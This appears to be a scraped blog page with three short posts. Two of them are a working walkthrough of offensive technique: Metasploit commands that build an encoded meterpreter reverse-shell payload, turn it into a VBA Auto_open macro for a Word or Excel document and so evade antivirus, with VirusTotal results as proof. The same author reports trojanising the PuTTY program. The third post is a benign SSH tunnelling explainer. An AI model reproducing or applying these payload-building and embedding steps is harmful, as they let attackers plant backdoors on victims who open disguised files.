My Library

This is the way on how I embedded it. root@LM:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.211.55.162 LPORT=8080 R | ./msfencode -t exe -e x86/shikata_ga_nai X > payload.exe [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1) root@LM:/opt/metasploit3/msf# root@LM:/opt/metasploit3/msf3# mv payload.exe tools/ root@LM:/opt/metasploit3/msf3/tools# ruby exe2vba.rb payload.exe payload.vbs [*] Converted 73802 bytes of EXE into a VBA script #payload.vbs Now open your MS WORD/EXECL and perform this following step. In Word or Excel 2003, go to Tools, Macros, Visual Basic Editor, if you’re using Word/Excel 2007, go to View Macros, then place a name like “lancit” and select “create”. It's will pop-up a visual basic editor and paste the output of the payload.vbs and safe it.Put any word you in your actual word doc itself.The purpose is for the client-side-attack. The Output is like this : Sub Auto_open() . . . . . . En...

Why its cant be detected,where at first I encode it with *.exe then I manipulate it using ruby to be embedded inside *.vbs extension and below is the result from virus total. File name:payload.vbs Submission date:2011-05-23 17:32:43 (UTC) Current status:finished Result:0/ 42 (0.0%) Additional information MD5 : 8e54f3b36507c7c3f4a80ee336e367ae SHA1 : ed8ba524a09494dcd7f86dbe5859339706264911 SHA256: 3ff926d2c6dfcee6443de3f0f0916a5ce1d1ccebe6f55399fcb8118758fc041d ssdeep: 6144:kgwFOmxCAB1vR5CGikL/xz+fk+8yXRruNG63b/IjRuePX7k49TQ7rBlLRc3aT+ch:vwEmw AvvR5CbS/9R+86RruNbLgduePXI File size : 297145 bytes First seen: 2011-05-23 17:32:43 Last seen : 2011-05-23 17:32:43 TrID: Unknown! sigcheck: publisher....: n/a copyright....: n/a product......: n/a description..: n/a original name: n/a internal name: n/a file version.: n/a comments.....: n/a signers......: - signing date.: - verified.....: Unsigned

Hi Guys, Tonight I manage to embedded PAYLOAD inside putty and according to VirusTotal I manage to be detected (As Below Result). File name:putty01.exe Result:18/ 42 (42.9%) The AV that detected are : AntiVir 7.11.8.89 2011.05.21 TR/Crypt.XPACK.Gen Avast 4.8.1351.0 2011.05.22 Win32:Vykuk Avast5 5.0.677.0 2011.05.22 Win32:Vykuk BitDefender 7.2 2011.05.22 Backdoor.Shell.AC CAT-QuickHeal 11.00 2011.05.22 (Suspicious) - DNAScan Commtouch 5.3.2.6 2011.05.22 W32/Swrort.D Comodo 8797 2011.05.22 Heur.Corrupt.PE DrWeb 5.0.2.03300 2011.05.22 Trojan.Packed.196 eSafe 7.0.17.0 2011.05.22 Suspicious File F-Prot 4.6.2.117 2011.05.22 W32/Swrort.D F-Secure 9.0.16440.0 2011.05.22 Backdoor.Shell.AC GData 22 2011.05.22 Backdoor.Shell.AC Microsoft 1.6903 2011.05.22 Trojan:Win32/Swrort.A NOD32 6142 2011.05.22 a variant of Win32/Rozena.AG Norman 6.07.07 2011.05.22 W32/Swrort.A nProtect 2011-05-22.01 2011.05.22 Backdoor/W32.Shell.458752 Sophos 4.65.0 ...

A simple Explanation of SSH. Secure SHell Connectivity tools for secure communications over the internet. SSH is a replacement for:telnet & rlogin.All communication is encrypted. Purpose Common used of SSH: 1.You want to access a web interface that lies behind a firewall 2.You want to secure your communications when you are in a public WLAN Step Take(By Problem) ========= 1.Problem: the server you want to access, can only be reached via VPN Solution: create a reverse tunnel Login to your server over your VPN ssh -R 9995:localhost:22 your.ssh-server.net if you are logged in on your.ssh-server.net you can now access the remote server without vpn: ssh -p 9995 localhost 2.Forward all your traffic through a tunnel Connet to your server at first. ssh -D 8888 your.ssh-server.net Define a SOCKS-Proxy in your Browser settings with host '127.0.0.1' and port '8888' Now all your traffic seems to come from that host! Enjoy!